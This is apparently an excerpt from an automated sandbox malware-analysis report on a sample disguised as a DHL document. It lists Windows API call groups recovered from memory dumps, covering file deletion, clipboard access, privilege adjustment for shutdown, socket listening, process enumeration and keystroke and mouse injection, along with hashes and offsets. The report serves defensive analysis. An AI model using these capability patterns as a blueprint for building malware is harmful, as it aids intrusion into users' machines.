                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1946585618-1173974218
                                                                                      • Opcode ID: 4bf4caa01191087c23dfc9292e5b574eae86ce6dac37b16d7b2e556bef07a453
                                                                                      • Instruction ID: 68a07b9260a803f0d34132b32ec99e1d497784ad96b3b4f0d6bac2e6f6d8aded
                                                                                      • Opcode Fuzzy Hash: 4bf4caa01191087c23dfc9292e5b574eae86ce6dac37b16d7b2e556bef07a453
                                                                                      • Instruction Fuzzy Hash: FA617C3184510DABDF06EBE0DA92DEDB7B9AF55300F604166E442771A2EF30AF09DB60
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1737998785-0
                                                                                      • Opcode ID: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                                                                      • Instruction ID: 52fee5a0436d58109a5c7274bc8d4bda53593e9afb5465856b973b1530663c2c
                                                                                      • Opcode Fuzzy Hash: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                                                                      • Instruction Fuzzy Hash: A541CD35204651AFE720CF55D888F59BBE5FF45329F14C099E45A8BA62C739EC42CB90
                                                                                      APIs
                                                                                        • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                        • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                        • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 0009E932
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                      • API String ID: 2234035333-3163812486
                                                                                      • Opcode ID: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                                                                      • Instruction ID: cc19a8983acc6c6d2992c43a49adc68e1682a102a79cc99b4026ab16e9c5d437
                                                                                      • Opcode Fuzzy Hash: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                                                                      • Instruction Fuzzy Hash: A501F972B10211AFFF64A7B4DC86FFF72ACA714750F150521FD13E21D2D9A55C40A190
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000B1276
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1283
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 000B12BA
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B12C5
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B12F4
                                                                                      • listen.WSOCK32(00000000,00000005), ref: 000B1303
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B130D
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B133C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                      • String ID:
                                                                                      • API String ID: 540024437-0
                                                                                      • Opcode ID: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                                                                      • Instruction ID: 5b8665cc20aae47c41514f0cb18bce74db9faca1c94caa50ca62f9064ff440aa
                                                                                      • Opcode Fuzzy Hash: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                                                                      • Instruction Fuzzy Hash: 91417271A001009FE710DF64C494FAABBE6AF46318F588198D85A9F293C775ED85CBE1
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0006B9D4
                                                                                      • _free.LIBCMT ref: 0006B9F8
                                                                                      • _free.LIBCMT ref: 0006BB7F
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
                                                                                      • _free.LIBCMT ref: 0006BD4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 314583886-0
                                                                                      • Opcode ID: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                                                                      • Instruction ID: 58d61816519d85ce935f20488a3f1af2a1fc19c34e37f810c7d72307f5f58c60
                                                                                      • Opcode Fuzzy Hash: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                                                                      • Instruction Fuzzy Hash: ADC106B1A04205AFDB249F78CC51AEE7BFBEF41350F2441AAE494D7252EB709E81CB50
                                                                                      APIs
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009D420
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D470
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D481
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D498
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D4A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 2649000838-1173974218
                                                                                      • Opcode ID: 35851fdecccd56f4ca9c5a0744796b6418b372b9a083ce1aac94979664f86c8a
                                                                                      • Instruction ID: 090d73cf2960befda32fbb480a62d5f7a3204a30c38a7741a450837f80c5f10f
                                                                                      • Opcode Fuzzy Hash: 35851fdecccd56f4ca9c5a0744796b6418b372b9a083ce1aac94979664f86c8a
                                                                                      • Instruction Fuzzy Hash: 76317C710483459BD701EF64D8918EFB7ECAF92310F444A1EF4D5921A2EB20AA09DB63
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                                                                      • Instruction ID: cb51005c52b24984d30575d61d7a292c269593a44ef73ec8cee98cf77b3e3851
                                                                                      • Opcode Fuzzy Hash: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                                                                      • Instruction Fuzzy Hash: A5C24A71E086298FDB65CE28DD407EAB7F6EB48305F1441EAD84EE7241E774AE858F40
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 000A64DC
                                                                                      • CoInitialize.OLE32(00000000), ref: 000A6639
                                                                                      • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A6650
                                                                                      • CoUninitialize.OLE32 ref: 000A68D4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 886957087-24824748
                                                                                      • Opcode ID: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                                                                      • Instruction ID: a755369f84d5491f7ba026bce21061fa6cef6d1fa8dea5a07605ee30286083da
                                                                                      • Opcode Fuzzy Hash: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                                                                      • Instruction Fuzzy Hash: 13D16971508201AFD315EF64C881EABB7E8FF95304F04496DF5958B292EB71ED09CB92
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 000B22E8
                                                                                        • Part of subcall function 000AE4EC: GetWindowRect.USER32(?,?), ref: 000AE504
                                                                                      • GetDesktopWindow.USER32 ref: 000B2312
                                                                                      • GetWindowRect.USER32(00000000), ref: 000B2319
                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 000B2355
                                                                                      • GetCursorPos.USER32(?), ref: 000B2381
                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000B23DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2387181109-0
                                                                                      • Opcode ID: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                                                                      • Instruction ID: f6961c7161b0a8e59cb3a3178754536a94e0950b047ac11fd4dab9a4df171e76
                                                                                      • Opcode Fuzzy Hash: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                                                                      • Instruction Fuzzy Hash: 0731D072504315AFEB20DF54C849F9BB7E9FF88710F000A19F98997191DB35EA09CB92
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 000A9B78
                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000A9C8B
                                                                                        • Part of subcall function 000A3874: GetInputState.USER32 ref: 000A38CB
                                                                                        • Part of subcall function 000A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000A9BA8
                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000A9C75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1972594611-438819550
                                                                                      • Opcode ID: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                                                                      • Instruction ID: f0e7e3bf6669153aa9e87861b77d67e6d30c823efee9c4c7c670f47e27be0657
                                                                                      • Opcode Fuzzy Hash: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                                                                      • Instruction Fuzzy Hash: D4418271A0460A9FDF55DFA4CD85EEEBBF8EF06310F248155E905A6192EB309E84CF60
                                                                                      Strings
                                                                                      • e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564, xrefs: 00075D0F
                                                                                      • ERCP, xrefs: 0003813C
                                                                                      • VUUU, xrefs: 0003843C
                                                                                      • VUUU, xrefs: 000383FA
                                                                                      • VUUU, xrefs: 000383E8
                                                                                      • VUUU, xrefs: 00075DF0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564
                                                                                      • API String ID: 0-1741966463
                                                                                      • Opcode ID: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                                                                      • Instruction ID: b25fbd320c6b070b9df1cd388857161e1e38493ccc591583acc686938daf4fee
                                                                                      • Opcode Fuzzy Hash: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                                                                      • Instruction Fuzzy Hash: 75A28E70E0061ACBDF75CF58C8457EEB7B5BB44310F24C1A9E81AA7281EB759E81CB94
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00049A4E
                                                                                      • GetSysColor.USER32(0000000F), ref: 00049B23
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00049B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3131106179-0
                                                                                      • Opcode ID: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                                                                      • Instruction ID: b5f28a87c658d71f3e75c828daae8e0a27486c26938d81607ab5dd5660d5276a
                                                                                      • Opcode Fuzzy Hash: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                                                                      • Instruction Fuzzy Hash: 6EA13AF0108404BEE778BB2C8C48EBF36DDEB42350B254239F546D6A96CA25DD51C3BA
                                                                                      APIs
                                                                                        • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                        • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000B185D
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1884
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 000B18DB
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B18E6
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B1915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1601658205-0
                                                                                      • Opcode ID: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                                                                      • Instruction ID: c6f4e12f4ff35de1769cdcdb6063e8ee02445b1538d0e7144c7e13066591265a
                                                                                      • Opcode Fuzzy Hash: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                                                                      • Instruction Fuzzy Hash: 9851C8B5A002006FEB11AF24C896FAA77E5AF44718F54845CFA09AF3D3CB75AD41CB91
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                      • String ID:
                                                                                      • API String ID: 292994002-0
                                                                                      • Opcode ID: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                                                                      • Instruction ID: 37815dcc9fd267c7b3c9e21cf9a43a1d7ccac5de30655a3ee541405882940c53
                                                                                      • Opcode Fuzzy Hash: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                                                                      • Instruction Fuzzy Hash: E52180317402105FE7208F1AC884FAE7BE5AF96315F19806CE84A8B352C775DC42CB90
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 000BA6AC
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 000BA6BA
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 000BA79C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BA7AB
                                                                                        • Part of subcall function 0004CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00073303,?), ref: 0004CE8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1991900642-0
                                                                                      • Opcode ID: df59a0dc9a62d9fe134fa01bb8c8e2d6c46e914fe7e77d07bbe2242ac6730337
                                                                                      • Instruction ID: fb2b02e498359e295122868607da3899b03e45c1556c59e0dfb1d3081c8c549e
                                                                                      • Opcode Fuzzy Hash: df59a0dc9a62d9fe134fa01bb8c8e2d6c46e914fe7e77d07bbe2242ac6730337
                                                                                      • Instruction Fuzzy Hash: E25160B1508301AFD710DF25C886EABBBE8FF89754F40892DF58997252EB71D904CB92
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0009AAAC
                                                                                      • SetKeyboardState.USER32(00000080), ref: 0009AAC8
                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0009AB36
                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0009AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
